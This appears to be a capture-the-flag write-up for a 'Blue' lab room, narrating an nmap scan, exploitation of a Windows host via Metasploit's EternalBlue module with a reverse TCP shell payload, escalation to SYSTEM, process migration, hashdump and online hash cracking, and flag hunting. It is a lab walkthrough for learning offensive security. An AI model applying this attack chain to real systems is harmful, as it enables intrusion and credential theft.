Blue

Task 1 Recon

Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)

For this I just used the syntax # nmap -p1-1000 -T4 -v -sV 10.10.97.125

How many ports are open with a port number under 1000?

Just count the returned ports un 1000

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

For this, I just ran search scanner/smb, and it came back with some options including eternalblue, I  ran that scanner against the target and showed it as vulnerable.

Task 2 Gain Access

Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

For this I just search eternalblue and it came up as option 0

Show options and set the one required value. What is the name of this value? (All caps for submission)

This is pretty easy just use show options and see which required value is set yet, then set it using set rhost (target IP)

Usually, it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:

set payload windows/x64/shell/reverse_tcp

With that done, run the exploit!

Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

Task 3 Escalate

If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in Metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

I opted just to search msfconsole using search post/meterpreter

Select this (use MODULE_PATH). Show options, what option are we required to change?

Pretty easy again just look for a setting that is required but has no value yet

Set the required option, you may need to list all of the sessions to find your target here.

We can use sessions -i, to see active sessions. Then just use set session 1.

Run! If this doesn’t work, try completing the exploit from the previous task once more.

Once the meterpreter shell conversion completes, select that session for use.

To do this you’ll need to see what new session was started so use sessions -I, then select it usings sessions -i (session number)

Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed a system. Background this shell afterward and select our meterpreter session for usage again.

List all of the processes running via the ‘ps’ command. Just because we are a system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

Task 4 Cracking

Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges. What is the name of the non-default user?  Just using hashdump returns a few hashes, just look through it.

Copy this password hash to a file and research how to crack it. What is the cracked password?

I opted to go fast and just use crackstation.net for this.

Task 5 Find flags!

Flag1? This flag can be found at the system root.

I didn’t get too crazy with this I just went back into the Windows shell we got and went to the c: and then used the type flag.txt to get the flag.

Flag2? This flag can be found at the location where passwords are stored within Windows.

 For this all we need to do is to navigate to C:\Windows\System32\config and it’s right there.

*Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare, however, it can happen.

flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

I wasn’t sure where to start, but I knew in the meterpreter shell I could invoke a search command for files. With this knowledge and the knowledge that the flags were flag2.txt, I deduced it would be flag3.txt, so I used search -f flag3.txt and found the file in the documents folder of John.